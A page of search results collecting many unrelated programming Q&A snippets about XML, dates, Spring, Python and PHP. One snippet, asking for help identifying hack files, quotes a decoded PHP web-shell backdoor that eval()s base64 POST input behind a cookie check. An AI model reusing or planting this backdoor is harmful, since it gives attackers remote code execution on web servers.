Search Results

Search found 24931 results on 998 pages for 'information visualization'.

Page 839/998 | < Previous Page | 835 836 837 838 839 840 841 842 843 844 845 846  | Next Page >

• How do I attach a link (to a View) to an image in ASP.NET MVC?

  - by Ryan Pitts

  Ok, so here is my situation. I am creating a web application using ASP.NET MVC 2 using the C# language. I have programmed in HTML, CSS, and PHP for several years and I am very new to ASP.NET. The part that I am having trouble with is the image gallery. The setup: I have a link on the navigation bar that goes to a "Galleries" page. This page will show a list of galleries. Each gallery has a title, an image, and a description. All of this information is pulled from an XML file. I'm using the XML file like a database. I wanted to use this method so that i could easily update the list of galleries and have the updated XML file automatically be reflected by the website. Now, the galleries should link to an "Images" page. This page will display a list of images within the gallery based on what gallery was selected. This page will also pull from an XML file. The problem: I cannot seem to attach a dynamic link to the image? I am also stuck and not sure how to get the correct View to display. I know I need to do something with the controllers and models, right? I have some code if needed? I would greatly appreciate any help or direction for this! Thanks!

  Read the article

• structDelete doesn't affect the shallow copy?

  - by Travis

  I was playing around onError so I tried to create an error using a large xml document object. <cfset XMLByRef = variables.parsedXML.XMLRootElement.XMLChildElement> <cfset structDelete(variables.parsedXML, "XMLRootElement")> <cfset startXMLShortLoop = getTickCount()> <cfloop from = "1" to = "#arrayLen(variables.XMLByRef)#" index = "variables.i"> <cfoutput>#variables.XMLByRef[variables.i].id.xmltext#</cfoutput><br /> </cfloop> <cfset stopXMLShortLoop = getTickCount()> I expected to get an error because I deleted the structure I was referencing. From LiveDocs: Variable Assignment - Creates an additional reference, or alias, to the structure. Any change to the data using one variable name changes the structure that you access using the other variable name. This technique is useful when you want to add a local variable to another scope or otherwise change a variable's scope without deleting the variable from the original scope. instead I got 580df1de-3362-ca9b-b287-47795b6cdc17 25a00498-0f68-6f04-a981-56853c0844ed ... ... ... db49ed8a-0ba6-8644-124a-6d6ebda3aa52 57e57e28-e044-6119-afe2-aebffb549342 Looped 12805 times in 297 milliseconds <cfdump var = "#variables#"> Shows there's nothing in the structure, just parsedXML.xmlRoot.xmlName with the value of XMLRootElement. I also tried <cfset structDelete(variables.parsedXML.XMLRootElement, "XMLChildElement")> as well as structClear for both. More information on deleting from the xml document object. http://help.adobe.com/en_US/ColdFusion/9.0/Developing/WSc3ff6d0ea77859461172e0811cbec22c24-78e3.html Can someone please explain my faulty logic? Thanks.

  Read the article

• How to change XmlSchemaElement.SchemaType (or: difference between SchemaType and ElementSchemaType)

  - by Gregor

  Hey, I'm working on a XML Editor which gets all his information from the corresponding XSD file. To work with the XSD files I use the System.Xml.Schema Namespace (XmlSchema*). Because of an 'xsi:type' attribute in the XML I've to change the XmlSchemaType of an XmlSchemaElement. Until now I use in my code the 'ElementSchemaType' property of 'XmlSchemaElement'. The nice thing about it: it's read only. There is also in 'XmlSchemaElement' an 'SchemaType' property which is not read only, but always null (yes, XmlSchema and XmlSchemaSet are compiled). So how can I change the type of the 'XmlSchemaElement'? Or, also the same question: What is the diffrence between this two porperties? Some technical data: C#, .NET 3.5 The MSDN documentation is nearly the same for both: SchemaType Documentation: Gets or sets the type of the element. This can either be a complex type or a simple type. ElementSchemaType Documentation: Gets an XmlSchemaType object representing the type of the element based on the SchemaType or SchemaTypeName values of the element.

  Read the article

• Synchronizing one or more databases with a master database - Foreign keys

  - by Ikke

  I'm using Google Gears to be able to use an application offline (I know Gears is deprecated). The problem I am facing is the synchronization with the database on the server. The specific problem is the primary keys or more exactly, the foreign keys. When sending the information to the server, I could easily ignore the primary keys, and generate new ones. But then how would I know what the relations are. I had one sollution in mind, bet the I would need to save all the pk for every client. What is the best way to synchronize multiple client with one server db. Edit: I've been thinking about it, and I guess seqential primary keys are not the best solution, but what other possibilities are there? Time based doesn't seem right because of collisions which could happen. A GUID comes to mind, is that an option? It looks like generating a GUID in javascript is not that easy. I can do something with natural keys or composite keys. As I'm thinking about it, that looks like the best solution. Can I expect any problems with that?

  Read the article

• Lost in dates and timezones

  - by Sebastien

  I'm working on an application that stores conferences with their start and end date. Up until now, I was developing in Belgium and my server is in France, so everything is in the same timezone, no problem. But today, I'm in San Francisco, my server is in France and I noticed I have a bug. I'm setting dates from a Flex client (ActionScript automatically adapts date display according to client local timezone, which is GMT-8 for me today. My server runs on Hibernate and MySQL in France (GMT+1). So when I look at my database using phpMyAdmin, I see a date set to "2010-06-07 00:00:01" but in my Flex client it displays "2010-06-06 15:00:01". Ultimately, what I want is that the dates are displayed in the local timezone of the event, which is the date I set it to. So when I'm in Belgium and I set the start date of an event to be "2010-06-07 00:00:01" I want to retrieve it that way. But I'm lost as to what layer adapts what. Is timezone stored in DATETIME MySQL columns (I can't see it in MySQL)? Does Hibernate to anything to it when it transfers it to java.lang.Date that has Timezone information? And ultimately, what is the best way to solve this mess?

  Read the article

• Moving to an arbitrary position in a file in Python

  - by B Rivera

  Let's say that I routinely have to work with files with an unknown, but large, number of lines. Each line contains a set of integers (space, comma, semicolon, or some non-numeric character is the delimiter) in the closed interval [0, R], where R can be arbitrarily large. The number of integers on each line can be variable. Often times I get the same number of integers on each line, but occasionally I have lines with unequal sets of numbers. Suppose I want to go to Nth line in the file and retrieve the Kth number on that line (and assume that the inputs N and K are valid --- that is, I am not worried about bad inputs). How do I go about doing this efficiently in Python 3.1.2 for Windows? I do not want to traverse the file line by line. I tried using mmap, but while poking around here on SO, I learned that that's probably not the best solution on a 32-bit build because of the 4GB limit. And in truth, I couldn't really figure out how to simply move N lines away from my current position. If I can at least just "jump" to the Nth line then I can use .split() and grab the Kth integer that way. The nuance here is that I don't just need to grab one line from the file. I will need to grab several lines: they are not necessarily all near each other, the order in which I get them matters, and the order is not always based on some deterministic function. Any ideas? I hope this is enough information. Thanks!

  Read the article

• Is the REST support in Spring 3's MVC Framework production quality yet?

  - by glenjohnson

  Hi all, Since Spring 3 was released in December last year, I have been trying out the new REST features in the MVC framework for a small commercial project involving implementing a few RESTful Web Services which consume XML and return XML views using JiBX. I plan to use either Hibernate or JDBC Templates for the data persistence. As a Spring 2.0 developer, I have found Spring 3's (and 2.5's) new annotations way of doing things quite a paradigm shift and have personally found some of the new MVC annotation features difficult to get up to speed with for non-trivial applications - as such, I am often having to dig for information in forums and blogs that is not apparent from going through the reference guide or from the various Spring 3 REST examples on the web. For deadline-driven production quality and mission critical applications implementing a RESTful architecture, should I be holding off from Spring 3 and rather be using mature JSR 311 (JAX-RS) compliant frameworks like RESTlet or Jersey for the REST layer of my code (together with Spring 2 / 2.5 to tie things together)? I had no problems using RESTlet 1.x in a previous project and it was quite easy to get up to speed with (no magic tricks behind the scenes), but when starting my current project it initially looked like the new REST stuff in Spring 3's MVC Framework would make life easier. Do any of you out there have any advice to give on this? Does anyone know of any commercial / production-quality projects using, or having successfully delivered with, the new REST stuff in Spring 3's MVC Framework. Many thanks Glen

  Read the article

• PHP/Javascript limiting amount of checkboxes

  - by Carl294

  Hi everyone Im trying to limit the amount of checkboxes that can be checked, in this case only 3 can be checked. When using plain HTML this works fine. The code can be seen below. HTML example <td ><input type=checkbox name=ckb value=2 onclick='chkcontrol()';></td><td>Perl</td> Javascript Function <script type="text/javascript"> function chkcontrol(j) { var total=0; for(var i=0; i < document.form1.ckb.length; i++){ if(document.form1.ckb[i].checked){ total =total +1;} if(total > 3){ alert("Please Select only three") document.form1.ckb[j].checked = false; return false; } } } </script> The problem appears when replacing the fixed HTML values with values from a MYSQL database. All the information appears correctly, and can be posted to another page via a submit button. However, it seems like the 'value' assigned to each record from the database is not making its way too the javascript function. <td><input name="checkbox[]" type="checkbox" value="<?php echo $rows['TCA_QID'];?>" onclick="chkcontrol();"></td> I have tried changed the name in the javascript function to match the 'checkbox' name.Any advice would be greatly appreciated Thanks

  Read the article

• What caused the rails application crash?

  - by so1o

  I'm sure someone can explain this. we have an application that has been in production for an year. recently we saw an increase in number of support requests for people having difficulty signing into the system. after scratching our head because we couldn't recreate the problem in development, we decided we'll switch on debug logger in production for a month. that was june 5th. application worked fine with the above change and we were waiting. then yesterday we noticed that the log files were getting huge so we made another change in production config.logger = Logger.new("#{RAILS_ROOT}/log/production.log", 50, 1048576) after this change, the application started crashing while processing a particular file. this particular line of code was RAILS_DEFAULT_LOGGER.info "Payment Information Request: ", request.inspect as you can see there was a comma instead of a plus sign. this piece of code was introduced in Mar. the question is this: why did the application fail now? if changing the debug level caused the application to process this line of code it should have started failing on june 5th! why today. please someone help us. Are we missing the obvious here? if you dont have an answer, at least let us know we aren't the only one that are bonkers.

  Read the article

• Latex - Apply an operation to every character in a string

  - by hroest

  Hi I am using LaTeX and I have a problem concerning string manipulation. I want to have an operation applied to every character of a string, specifically I want to replace every character "x" with "\discretionary{}{}{}x". I want to do this because I have a long string (DNA) which I want to be able to separate at any point without hyphenation. Thus I would like to have a command called "myDNA" that will do this for me instead of inserting manually \discretionary{}{}{} after every character. Is this possible? I have looked around the web and there wasnt much helpful information on this topic (at least not any I could understand) and I hoped that you could help. --edit To clarify: What I want to see in the finished document is something like this: the dna sequence is CTAAAGAAAACAGGACGATTAGATGAGCTTGAGAAAGCCATCACCACTCA AATACTAAATGTGTTACCATACCAAGCACTTGCTCTGAAATTTGGGGACTGAGTACACCAAATACGATAG ATCAGTGGGATACAACAGGCCTTTACAGCTTCTCTGAACAAACCAGGTCTCTTGATGGTCGTCTCCAGGT ATCCCATCGAAAAGGATTGCCACATGTTATATATTGCCGATTATGGCGCTGGCCTGATCTTCACAGTCAT CATGAACTCAAGGCAATTGAAAACTGCGAATATGCTTTTAATCTTAAAAAGGATGAAGTATGTGTAAACC CTTACCACTATCAGAGAGTTGAGACACCAGTTTTGCCTCCAGTATTAGTGCCCCGACACACCGAGATCCT AACAGAACTTCCGCCTCTGGATGACTATACTCACTCCATTCCAGAAAACACTAACTTCCCAGCAGGAATT just plain linebreaks, without any hyphens. The DNA sequence will be one long string without any spaces or anything but it can break at any point. This is why my idea was to inesert a "\discretionary{}{}{}" after every character, so that it can break at any point without inserting any hyphens.

  Read the article

• PHP hack files found - help decoding and identifying

  - by akc

  I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like: if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;} But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704 I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated. I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla Thanks!

  Read the article

• C++ How to read a string of text and create object of their class

  - by user1777711

  After reading a text file... The following information is available Point2D, [3, 2] Line3D, [7, 12, 3], [-9, 13, 68] Point3D, [1, 3, 8] Line2D, [5, 7], [3, 8] Point2D, [3, 2] Line3D, [7, -12, 3], [9, 13, 68] Point3D, [6, 9, 5] Point2D, [3, 2] Line3D, [70, -120, -3], [-29, 1, 268] Line3D, [25, -69, -33], [-2, -41, 58] Point3D, [6, 9, -50] The first data separate by the delimiter comma is the class name. for each of the 4 class Point2D,Line3D,Point3D,Line2D How do i like store them into relevant object base on their class means.. when it read first line Point2D, [3, 2] It will store it as Point2D object with the Data [3, 2] But the issue is what dataset should i pick, Vector, Set , Map or List I was thinking to actually create a data set then but i can't use new Point2D(); since Point2D is parent of Point3D Line2D is parent of Line3D and theres no parent class of Point2D and Line2D. how can i like create a object of them in a data set like e.g Vector so Vector[0] is of Point2D class with data [3,2] , then Vector[1] is of Line3D class with data [7, 12, 3], [-9, 13, 68] Thanks for helping.!

  Read the article

• Why can't I display a unicode character in the Python Interpreter on Mac OS X Terminal.app?

  - by apphacker

  If I try to paste a unicode character such as the middle dot: · in my python interpreter it does nothing. I'm using Terminal.app on Mac OS X and when I'm simply in in bash I have no trouble: :~$ · But in the interpreter: :~$ python Python 2.6.1 (r261:67515, Feb 11 2010, 00:51:29) [GCC 4.2.1 (Apple Inc. build 5646)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> ^^ I get nothing, it just ignores that I just pasted the character. If I use the escape \xNN\xNN representation of the middle dot '\xc2\xb7', and try to convert to unicode, trying to show the dot causes the interpreter to throw an error: >>> unicode('\xc2\xb7') Traceback (most recent call last): File "<stdin>", line 1, in <module> UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position 0: ordinal not in range(128) I have setup 'utf-8' as my default encoding in sitecustomize.py so: >>> sys.getdefaultencoding() 'utf-8' What gives? It's not the Terminal. It's not Python, what am I doing wrong?! This question is not related to this question, as that indivdiual is able to paste unicode into his Terminal.

  Read the article

• PHP URL parameters append return special character

  - by Alexandre Lavoie

  I'm programming a function to build an URL, here it is : public static function requestContent($p_lParameters) { $sParameters = "?key=TEST&format=json&jsoncallback=none"; foreach($p_lParameters as $sParameterName => $sParameterValue) { $sParameters .= "&$sParameterName=$sParameterValue"; } echo "<span style='font-size: 16px;'>URL : http://api.oodle.com/api/v2/listings" . $sParameters . "</span><br />"; $aXMLData = file_get_contents("http://api.oodle.com/api/v2/listings" . $sParameters); return json_decode($aXMLData,true); } And I am calling this function with this array list : print_r() result : Array ( [region] => canada [category] => housing/sale/home ) But this is very strange I get an unexpected character (note the special character none*®*ion) : http://api.oodle.com/api/v2/listings?key=TEST&format=json&jsoncallback=none®ion=canada&category=housing/sale/home For information I use this header : <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <?php header('Content-Type: text/html;charset=UTF-8'); ?> EDIT : $sRequest = "http://api.oodle.com/api/v2/listings?key=TEST&format=json&jsoncallback=none&region=canada&category=housing/sale/home"; echo "<span style='font-size: 16px;'>URL : " . $sRequest . "</span><br />"; return the exact URL with problem : http://api.oodle.com/api/v2/listings?key=TEST&format=json&jsoncallback=none®ion=canada&category=housing/sale/home Thank you for your help!

  Read the article

• Is DB logging more secure than file logging for my PHP web app?

  - by iama

  I would like to log errors/informational and warning messages from within my web application to a log. I was initially thinking of logging all of these onto a text file. However, my PHP web app will need write access to the log files and the folder housing this log file may also need write access if log file rotation is desired which my web app currently does not have. The alternative is for me to log the messages to the MySQL database since my web app is already using the MySQL database for all its data storage needs. However, this got me thinking that going with the MySQL option is much better than the file option since I already have a configuration file with the database access information protected using file system permissions. If I now go with the log file option I need to tinker the file and folder access permissions and this will only make my application less secure and defeats the whole purpose of logging. Is this correct? I am using XAMPP for development and am a newbie to LAMP. Please let me know your recommendations for logging. Thanks.

  Read the article

• Learning libraries without books or tutorials

  - by Kawili-wili

  While many ask questions about where to find good books or tutorials, I'd like to take the opposite tack. I consider myself to be an entry-level programmer ready to move up to mid-level. I have written code in c, c++, c#, perl, python, clojure, vb, and java, so I'm not completely clueless. Where I see a problem in moving to the next level is learning to make better use of the literally hundreds upon hundreds of libraries available out there. I seem paralyzed unless there is a specific example in a book or tutorial to hand-hold me, yet I often read in various forums where another programmer attempts to assist with a question. He/she will look through the docs or scan the available classes/methods in their favorite IDE and seem to grok what's going on in a relatively short period of time, even if they had no previous experience with that specific library or function. I yearn to break the umbilical chord of constantly spending hour upon hour searching and reading, searching and reading, searching and reading. Many times there is no book or tutorial, or if there is, the discussion glosses over my specific needs or the examples shown are too far off the path for the usage I had in mind or the information is outdated and makes use of deprecated components or the library itself has fallen out of mainstream, yet is still perfectly usable (but no docs, books, or tutorials to hand-hold). My question is: In the absence of books or tutorials, what is the best way to grok new or unfamiliar libraries? I yearn to slicken the grok path so I can get down to the business of doing what I love most -- coding.

  Read the article

• What is the benefit of using ONLY OpenID authentication on a site?

  - by Peter

  From my experience with OpenID, I see a number of significant downsides: Adds a Single Point of Failure to the site It is not a failure that can be fixed by the site even if detected. If the OpenID provider is down for three days, what recourse does the site have to allow its users to login and access the information they own? Takes a user to another sites content and every time they logon to your site Even if the OpenID provider does not have an error, the user is re-directed to their site to login. The login page has content and links. So there is a chance a user will actually be drawn away from the site to go down the Internet rabbit hole. Why would I want to send my users to another company's website? [ Note: my provider no longer does this and seems to have fixed this problem (for now).] Adds a non-trivial amount of time to the signup To sign up with the site a new user is forced to read a new standard, chose a provider, and signup. Standards are something that the technical people should agree to in order to make a user experience frictionless. They are not something that should be thrust on the users. It is a Phisher's Dream OpenID is incredibly insecure and stealing the person's ID as they log in is trivially easy. [ taken from David Arno's Answer below ] For all of the downside, the one upside is to allow users to have fewer logins on the Internet. If a site has opt-in for OpenID then users who want that feature can use it. What I would like to understand is: What benefit does a site get for making OpenID mandatory?

  Read the article

• Python Interactive Interpreter always returns "Invalid syntax" on Windows

  - by user559217

  I've encountered an extremely confusing problem. Whatever I type into the Python interpreter returns "Invalid Syntax". See examples below. I've tried fooling around with the code page of the prompt I run the interpreter from, but it doesn't seem to help at all. Furthermore, I haven't been able to find this particular, weird bug elsewhere online. Any assistance anyone could provide would be lovely. I've already tried reinstalling Python, but I didn't have any luck - the problem is also there in both 3.13 and 2.7. Running: Python version 3.1.3, Windows XP SP3. Getting: C:\Program Files\Python31>.\python Python 3.1.3 (r313:86834, Nov 27 2010, 18:30:53) [MSC v.1500 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> 2+2 File "<stdin>", line 1 2+2 ^ SyntaxError: invalid syntax >>> x = "Oh, fiddlesticks." File "<stdin>", line 1 x = "Oh, fiddlesticks." ^ SyntaxError: invalid syntax

  Read the article

• Approaches for cross server content sharing?

  - by Anonymity

  I've currently been tasked with finding a best solution to serving up content on our new site from another one of our other sites. Several approaches suggested to me, that I've looked into include using SharePoint's Lists Web Service to grab the list through javascript - which results in XSS and is not an option. Another suggestion was to build a server side custom web service and use SharePoint Request Forms to get the information - this is something I've only very briefly looked at. It's been suggested that I try permitting the requesting site in the HTTP headers of the serving site since I have access to both. This ultimately resulted in a semi-working solution that had major security holes. (I had to include username/password in the request to appease AD Authentication). This was done by allowing Access-Control-Allow-Origin: * The most direct approach I could think of was to simply build in the webpart in our new environment to have the authors manually update this content the same as they would on the other site. Are any one of the suggestions here more valid than another? Which would be the best approach? Are there other suggestions I may be overlooking? I'm also not sure if WebCrawling or Content Scrapping really holds water here...

  Read the article

• Subclassing ViewPager Breaks Animation

  - by Ryan Thomas

  In my Android application I have an activity which uses a view pager to display 4+ pages (Fragments). I implemented buttons on each screen that move between pages by calling: pager.setCurrentItem(position, true); The view pager and fragments are all working as I desired. I then began looking for a solution to disable user swiping between pages so that the transition between pages in handled by the buttons only. The solution I found was mentioned in a few stackoverflow articles as well as This Blog that suggest subclassing the view pager to intercept touch events to disable swiping. I followed those examples by subclassing the view pager class as follows: public class ViewPager extends android.support.v4.view.ViewPager { private boolean enabled; public ViewPager(Context context, AttributeSet attrs) { super(context, attrs); this.enabled = true; } @Override public boolean onTouchEvent(MotionEvent event) { if (this.enabled) { return super.onTouchEvent(event); } return false; } @Override public boolean onInterceptTouchEvent(MotionEvent event) { if (this.enabled) { return super.onInterceptTouchEvent(event); } return false; } public void setSwipingEnabled(boolean enabled) { this.enabled = enabled; } } Using the subclassed view pager and calling setSwipingEnabled(false) works as was desired. The user can no longer move between pages with swipe gestures and I can still move between pages via button clicks by calling setCurrentItem(int position, boolean smoothScroll). However using the subclass breaks the animation between pages. When I call setCurrentItem(position, true) with android.support.v4.view.ViewPager I get very clean scrolling animations between pages. When I make the same call using the subclass the screen has a very brief 'flash' and then automatically draws the new page. I would like to know how to fix the animation while retaining the ability to disable user swiping between pages. I greatly appreciate any help with this. Let me know if you need any additional information. So far I have tested using a Samsung device running 2.3.5 and an AVD emulator targeting Android 2.3.3.

  Read the article

• getting jpeg error

  - by bhaskaragr29

  <?php function LoadPNG() { /* Attempt to open */ //require_once 'resizex.php'; $imgname="/home2/puneetbh/public_html/prideofhome/wp-content/uploads/268995481image_11.png"; //$im = @imagecreatefrompng($imgname); $img= imagecreatefromstring(file_get_contents($imgname)); //$im=imagecreatefrompng('images/frame.png'); $im= imagecreatefromjpeg('images/frame.jpeg'); //imagealphablending($img, false); //imagesavealpha($img, true); //$img=resizex("$url",60,65,1); imagecopymerge($im,$img,105,93,0, 0,275,258,100); /* See if it failed */ if(!$im) { /* Create a blank image */ $im = imagecreatetruecolor(150, 30); $bgc = imagecolorallocate($im, 255, 255, 255); $tc = imagecolorallocate($im, 0, 0, 0); imagefilledrectangle($im, 0, 0, 150, 30, $bgc); /* Output an error message */ imagestring($im, 1, 5, 5, 'Error loading ' . $imgname, $tc); } return $im; } $img = LoadPNG(); header('Content-type: image/jpeg'); imagejpeg($im); imagedestroy($im); imagedestroy($img); ?> i am getting error arning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: gd-jpeg: JPEG library reports unrecoverable error: in /home2/puneetbh/public_html/prideapp/frame.php on line 11 Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: 'images/frame.jpeg' is not a valid JPEG file in /home2/puneetbh/public_html/prideapp/frame.php on line 11 Warning: imagecopymerge(): supplied argument is not a valid Image resource in /home2/puneetbh/public_html/prideapp/frame.php on line 16 Warning: Cannot modify header information - headers already sent by (output started at /home2/puneetbh/public_html/prideapp/frame.php:11) in /home2/puneetbh/public_html/prideapp/frame.php on line 34 Warning: imagejpeg(): supplied argument is not a valid Image resource in /home2/puneetbh/public_html/prideapp/frame.php on line 35 Warning: imagedestroy(): supplied argument is not a valid Image resource in /home2/puneetbh/public_html/prideapp/frame.php on line 36

  Read the article

• Distinct or group by on some columns but not others

  - by Nazadus

  I have a view that I'm trying to filter with something similar to DISTINCT on some columns but not others. I have a view like this: Name LastName Zip Street1 HouseholdID (may not be unique because it may have multiple addresses -- think of it in the logical sense as grouping persons but not physical locations; If you lookup HouseholdID 4130, you may get two rows.. or more, because the person may have mutiple mailing locations) City State I need to pull all those columns but filter on LastName,Zip, and Street1. Here's the fun part: The filter is arbitrary -- meaning I don't care which one of the duplicates goes away. This is for a mail out type thing and the other information is not used for any other reason than than to look up a specific person if needed (I have no idea why). So.. given one of the records, you can easily figure out the removed ones. As it stands now, my Sql-Fu fails me and I'm filtering in C# which is incredibly slow and is pretty much a foreach that starts with an empty list and adds the row in if the combined last name, zip, and street aren't are not in the list. I feel like I'm missing a simple / basic part of SQL that I should be understanding.

  Read the article

• Storing date/times as UTC in database

  - by James

  I am storing date/times in the database as UTC and computing them inside my application back to local time based on the specific timezone. Say for example I have the following date/time: 01/04/2010 00:00 Say it is for a country e.g. UK which observes DST (Daylight Savings Time) and at this particular time we are in daylight savings. When I convert this date to UTC and store it in the database it is actually stored as: 31/03/2010 23:00 As the date would be adjusted -1 hours for DST. This works fine when your observing DST at time of submission. However, what happens when the clock is adjusted back? When I pull that date from the database and convert it to local time that particular datetime would be seen as 31/03/2009 23:00 when in reality it was processed as 01/04/2010 00:00. Correct me if I am wrong but isn't this a bit of a flaw when storing times as UTC? Example of Timezone conversion Basically what I am doing is storing the date/times of when information is being submitted to my system in order to allow users to do a range report. Here is how I am storing the date/times: public DateTime LocalDateTime(string timeZoneId) { var tzi = TimeZoneInfo.FindSystemTimeZoneById(timeZoneId); return TimeZoneInfo.ConvertTimeFromUtc(DateTime.UtcNow, tzi).ToLocalTime(); } Storing as UTC: var localDateTime = LocalDateTime("AUS Eastern Standard Time"); WriteToDB(localDateTime.ToUniversalTime());

  Read the article

• In this example, would Customer or AccountInfo properly be the entity group parent?

  - by Badhu Seral

  In this example, the Google App Engine documentation makes the Customer the entity group parent of the AccountInfo entity. Wouldn't AccountInfo encapsulate Customer rather than the other way around? Normally I would think of an AccountInfo class as including all of the information about the Customer. import javax.jdo.annotations.IdGeneratorStrategy; import javax.jdo.annotations.PersistenceCapable; import javax.jdo.annotations.Persistent; import javax.jdo.annotations.PrimaryKey; import com.google.appengine.api.datastore.Key; import com.google.appengine.api.datastore.KeyFactory; @PersistenceCapable public class AccountInfo { @PrimaryKey @Persistent(valueStrategy = IdGeneratorStrategy.IDENTITY) private Key key; public void setKey(Key key) { this.key = key; } } // ... KeyFactory.Builder keyBuilder = new KeyFactory.Builder(Customer.class.getSimpleName(), "custid985135"); keyBuilder.addChild(AccountInfo.class.getSimpleName(), "acctidX142516"); Key key = keyBuilder.getKey(); AccountInfo acct = new AccountInfo(); acct.setKey(key); pm.makePersistent(acct);

  Read the article

• Why is my PHP upload script not working?

  - by Turner

  Hello all, I am doing some simple work with uploading a file. I am ignoring error checking and exceptions at this point just to get my uploads working. I have this HTML form: <form action='addResult.php' method='post' enctype='multipart/form-data' target='results_iFrame' onsubmit='startUpload();'> Entry: <input type='text' id='entry' /> Stop: <input type='text' id='stop' /> Final: <input type='text' id='final' /> Chart: <input type='file' id='chart' /> <input type='submit' value='Add' /></form> As you can see, it calls 'addResult.php' within the iFrame 'results_iFrame'. The Javascript is just for animation purposes and to tell me when things are finished. addResult.php has this code in it (along with processing the other inputs): $upload_dir = "../img/"; $chart_loc = $upload_dir.basename($_FILES['chart']['name']); move_uploaded_file($_FILES['chart']['tmp_name'], $chart_loc); print_r($_FILES); It uses the 'chart' input from the form and tries to upload it. I have the print_r() function to display some information on $_FILES, but the array is empty, thus making this fail. What could I be doing wrong?

  Read the article

< Previous Page | 835 836 837 838 839 840 841 842 843 844 845 846  | Next Page >